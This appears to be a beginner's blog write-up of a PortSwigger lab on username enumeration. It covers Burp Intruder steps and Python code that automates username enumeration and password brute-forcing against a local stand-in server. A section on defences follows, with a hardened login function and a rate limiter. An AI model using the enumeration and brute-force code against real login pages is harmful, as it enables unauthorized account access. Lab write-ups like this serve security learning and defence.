Hi everyone, this is my first blog on Medium. I am starting to learn web security from the PortSwigger Web Security Academy, and I came across this lab, which taught me the basics of authentication vulnerabilities. The following is what I learnt:
Lab Details
- Platform: PortSwigger Web Security Academy
- Lab: Username Enumeration via Different Responses
- Difficulty: Apprentice
- Category: Authentication Vulnerabilities
Understanding the Vulnerability
Authentication systems sometimes reveal unintended information through their responses.
In some applications, the server behaves differently depending on:
- whether the submitted username exists, and
- if it does, whether the password supplied for it is correct.
These differences may appear as:
- different error messages,
- different response lengths,
- different HTTP status codes,
- or slightly different response times.
Attackers can use these inconsistencies to identify valid usernames before attempting password attacks. This vulnerability is known as Username Enumeration.
Observation
While testing the login functionality, I noticed a difference in response timing for certain requests.
Using Burp Suite Intruder with a Sniper attack:
- I tested multiple usernames while keeping the password fixed.
- Some responses took slightly longer than others.
This timing difference suggested that:
- the application first checked whether the username existed,
- and then proceeded to validate the password.
If the username was invalid, the request was rejected immediately.
If the username was valid, the server performed an additional password verification step, causing a slightly longer response time.
This behavior leaked information about valid usernames.
Exploitation Steps
Step 1: Open the Target Application
Accessed the PortSwigger lab environment.
Step 2: Intercept the Login Request
Captured the login request using Burp Suite Proxy.
Step 3: Send Request to Intruder
Forwarded the request to Burp Suite Intruder for automated testing.
Step 4: Perform Username Enumeration
Executed a Sniper attack on the username field while keeping the password static.
Step 5: Analyze Responses
Compared:
- response timing,
- response length,
- and response behavior.
One username produced a noticeably different response time, indicating it was valid.
Step 6: Enumerate the Password
After identifying the valid username:
- I ran a second Intruder attack, this time on the password field, keeping the username fixed.
Step 7: Successful Login
The correct credentials were identified and used to successfully authenticate into the application.
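To make the two Intruder phases above concrete, here is an added Python example (my own illustration for this post, not code from PortSwigger or from Burp) that performs the same analysis offline. Intruder's result table lets you sort on status code, response length and time; `find_outliers` does exactly that by fingerprinting each response and flagging the payload whose fingerprint differs from the majority, and `timing_outliers` does the same for elapsed time. The `send` callable is injected so the logic can be driven by `fake_send`, a constructed stand-in for the lab server with made-up credentials (`alice` / `hunter2`); against a live target it would wrap `requests.post` and time the call. The `<p class=is-warning>` marker that `extract_error` looks for is an assumption about the lab's HTML.

```python
import statistics
from collections import Counter
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional


@dataclass(frozen=True)
class Response:
    """The columns Intruder lets you sort on: status, body (for length) and time."""
    status: int
    body: str
    elapsed_ms: float

    def fingerprint(self) -> tuple:
        return (self.status, len(self.body), extract_error(self.body))


def extract_error(body: str) -> str:
    """Pull the visible error text out of a <p class=is-warning> element.

    Assumption: that is how the lab renders login failures. Falls back to the
    stripped body when the element is absent (e.g. an empty-bodied redirect).
    """
    marker = "<p class=is-warning>"
    start = body.find(marker)
    if start == -1:
        return body.strip()
    start += len(marker)
    end = body.find("</p>", start)
    return body[start:end] if end != -1 else body[start:]


def find_outliers(results: dict) -> List[str]:
    """Payloads whose fingerprint differs from the majority response.

    Most wordlist entries get the same failure response; whichever payload
    does not is the one that stands out in Intruder's length/status columns.
    """
    counts = Counter(r.fingerprint() for r in results.values())
    baseline = counts.most_common(1)[0][0]
    return [p for p, r in results.items() if r.fingerprint() != baseline]


def timing_outliers(results: dict, min_gap_ms: float = 50.0) -> List[str]:
    """Payloads answered at least min_gap_ms slower than the median.

    Network jitter on a single request can swamp the real difference, so on a
    live target send each payload several times and compare medians instead.
    """
    median = statistics.median(r.elapsed_ms for r in results.values())
    return [p for p, r in results.items() if r.elapsed_ms - median >= min_gap_ms]


def enumerate_usernames(send: Callable[[str, str], Response],
                        usernames: Iterable[str],
                        password: str = "wrong-password-xyz") -> List[str]:
    """Sniper attack on the username field with one fixed, wrong password."""
    results = {u: send(u, password) for u in usernames}
    return find_outliers(results)


def brute_force_password(send: Callable[[str, str], Response],
                         username: str,
                         passwords: Iterable[str]) -> Optional[str]:
    """Sniper attack on the password field for a known username.

    Returns the single password whose response differs from the rest, or None
    when every candidate produced the same failure response.
    """
    results = {p: send(username, p) for p in passwords}
    hits = find_outliers(results)
    return hits[0] if len(hits) == 1 else None


# ---- constructed stand-in for the lab server (made-up credentials) ----
_VALID_ACCOUNTS = {"alice": "hunter2"}


def fake_send(username: str, password: str) -> Response:
    """Mimics the observable behaviour described in the post: a distinct
    message per failure, and extra password-checking work (a slower answer)
    only when the username exists. Successful login redirects."""
    if username not in _VALID_ACCOUNTS:
        return Response(200, "<p class=is-warning>Username does not exist</p>", 12.0)
    if _VALID_ACCOUNTS[username] != password:
        return Response(200, "<p class=is-warning>Incorrect password</p>", 95.0)
    return Response(302, "", 90.0)


if __name__ == "__main__":
    wordlist = ["bob", "alice", "carol", "dave"]  # constructed wordlist
    valid = enumerate_usernames(fake_send, wordlist)
    print("usernames with a different response:", valid)
    found = brute_force_password(fake_send, valid[0], ["letmein", "hunter2", "password"])
    print("password for", valid[0], "->", found)
```

Note that `brute_force_password` deliberately reuses `find_outliers` rather than looking for a specific status code: the "success" response is simply the one that does not look like all the failures, which is the same reasoning applied in Step 5.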
Payloads Used
Username Wordlist
https://portswigger.net/web-security/authentication/auth-lab-usernames
Password Wordlist
https://portswigger.net/web-security/authentication/auth-lab-passwords
Tools Used
- Burp Suite
- Google Chrome
Prevention Techniques
Applications should implement the following defenses to prevent username enumeration vulnerabilities:
Use Generic Error Messages
Avoid messages like:
- "Username does not exist"
- "Incorrect password"
Instead, always use:
"Invalid username or password."
Maintain Uniform Response Timing
Authentication requests should take approximately the same amount of time regardless of:
- whether the username exists,
- or whether the password is incorrect.
In practice this means doing the same password-verification work on every failure path, for example hashing the supplied password against a dummy record when the username is not found, instead of returning early.
Avoid Information Leakage
Applications should return:
- identical HTTP status codes,
- identical response structures,
- and consistent error messages.
Implement Rate Limiting
Restrict repeated login attempts, per account and per source IP, to slow down both username enumeration and password brute-forcing. The rate-limit response itself should be just as generic as the login failure, so it does not become a new way to tell valid accounts from invalid ones.
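As an added illustration (not code from the original post or from PortSwigger), the Python sketch below puts the vulnerable login pattern beside the hardened one so the two defences can be seen in code. `login_vulnerable` names the failing field and returns before hashing when the username is unknown, which is both the message leak and the timing leak; `login_hardened` always hashes against either the real record or a dummy one, compares with `hmac.compare_digest`, and returns one generic message. `RateLimiter` is a minimal sliding-window limiter keyed on client IP plus username. The user store, credentials and the `ITERATIONS` value are constructed for the example.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque

# PBKDF2 work factor, kept modest so the example runs quickly; raise it (or
# use Argon2/scrypt) in a real deployment.
ITERATIONS = 20_000
GENERIC_ERROR = "Invalid username or password."


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def make_record(password: str) -> dict:
    salt = os.urandom(16)
    return {"salt": salt, "hash": hash_password(password, salt)}


# Constructed user store (not real data). DUMMY exists so that an unknown
# username still costs exactly one password hash, matching the known-user path.
USERS = {"alice": make_record("correct horse battery")}
DUMMY = make_record(os.urandom(16).hex())


def login_vulnerable(username: str, password: str) -> tuple:
    """Leaks twice: the message says which field failed, and an unknown
    username returns before any hashing, so it answers measurably faster."""
    record = USERS.get(username)
    if record is None:
        return False, "Username does not exist"
    if hash_password(password, record["salt"]) != record["hash"]:
        return False, "Incorrect password"
    return True, "Welcome"


def login_hardened(username: str, password: str) -> tuple:
    """Same message and the same amount of work on every failure path."""
    record = USERS.get(username)
    target = record if record is not None else DUMMY
    candidate = hash_password(password, target["salt"])
    matched = hmac.compare_digest(candidate, target["hash"])
    if record is not None and matched:
        return True, "Welcome"
    return False, GENERIC_ERROR


class RateLimiter:
    """Sliding-window limiter; key it on something like f"{client_ip}:{username}".

    The clock is injectable so the behaviour can be tested without sleeping.
    """

    def __init__(self, max_attempts: int = 5, window_s: float = 60.0, clock=time.monotonic):
        self.max_attempts = max_attempts
        self.window_s = window_s
        self.clock = clock
        self._hits = defaultdict(deque)

    def allow(self, key: str) -> bool:
        now = self.clock()
        q = self._hits[key]
        while q and now - q[0] > self.window_s:
            q.popleft()  # drop attempts that have aged out of the window
        if len(q) >= self.max_attempts:
            return False
        q.append(now)
        return True


def handle_login(username: str, password: str, client_ip: str, limiter: RateLimiter) -> tuple:
    """Rate-limit first, then run the hardened check. The limited response is
    the same generic message, so throttling itself is not an oracle."""
    if not limiter.allow(f"{client_ip}:{username}"):
        return False, GENERIC_ERROR
    return login_hardened(username, password)


if __name__ == "__main__":
    for user in ("bob", "alice"):
        print(user, "vulnerable:", login_vulnerable(user, "guess"))
        print(user, "hardened:  ", login_hardened(user, "guess"))
```

Running the stand-alone block shows the difference directly: the vulnerable function gives two different messages for `bob` and `alice`, while the hardened one gives the same message for both, and because both paths run one PBKDF2 computation there is no early return for a timing attack to pick up.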
Key Learnings
This lab demonstrated how small inconsistencies in authentication mechanisms can expose sensitive information.
By analyzing server responses with Burp Suite, I learned:
- how attackers enumerate usernames,
- how response timing attacks work,
- and why secure authentication design is important.
Even tiny differences in server behavior can become valuable attack vectors in real-world applications.
Conclusion
This PortSwigger lab provided a practical demonstration of how authentication flaws can lead to username enumeration.
Using Burp Suite Intruder and response timing analysis, I was able to identify valid credentials and successfully authenticate into the application.
The lab reinforced the importance of:
- consistent authentication responses,
- secure validation workflows,
- and defensive application design.